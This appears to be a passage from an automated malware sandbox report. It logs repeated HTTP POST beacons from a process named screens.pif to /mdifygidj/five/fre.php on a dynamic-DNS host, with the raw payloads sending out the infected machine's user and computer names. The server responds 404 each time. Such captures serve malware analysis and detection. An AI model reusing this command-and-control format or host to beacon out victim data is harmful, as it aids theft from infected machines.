                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:22.564635992 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:22 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          77192.168.2.104979045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:22.725519896 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:22.731443882 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:23.426518917 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:22 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          78192.168.2.104979145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:23.585536003 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:23.590473890 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:24.372764111 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:23 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          79192.168.2.104979245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:24.513129950 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:24.518059969 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:25.207048893 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:24 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          80192.168.2.104979345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:25.363157988 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:25.368288040 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:26.051245928 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:25 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          81192.168.2.104979445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:26.202344894 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:26.207257986 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:26.870814085 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:26 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          82192.168.2.104979545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:27.017453909 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:27.022465944 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:27.946026087 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:27 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          83192.168.2.104979645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:28.112184048 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:28.117331028 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:28.768294096 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:28 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.104979745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:28.922904015 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:28.927858114 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:29.580168962 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:29 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          85192.168.2.104979845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:29.741869926 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:29.746973038 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:30.493874073 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:30 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          86192.168.2.104979945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:30.649540901 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:30.654397011 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:31.469435930 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:30 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          87192.168.2.104980045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:31.628278971 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:31.633255959 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:32.287770987 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:31 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          88192.168.2.104980145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:32.754582882 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:32.759509087 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:33.477503061 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:32 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          89192.168.2.104980245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:33.631897926 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:33.636826038 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:34.399502039 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:33 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          90192.168.2.104980345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:34.561244965 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:34.567445993 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:35.265968084 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:34 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          91192.168.2.104980445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:35.407145977 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:35.412081957 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:36.047740936 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:35 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          92192.168.2.104980545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:36.190355062 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:36.196016073 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:36.840380907 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:36 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          93192.168.2.104980645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:36.993830919 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:36.999089003 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:37.715905905 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:37 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          94192.168.2.104980745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:37.864594936 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:37.869566917 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:40.206928015 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:39 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          95192.168.2.104980845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:40.381808996 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:22:40.386730909 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:22:41.026272058 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:22:40 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          96192.168.2.104980945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:22:41.275152922 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
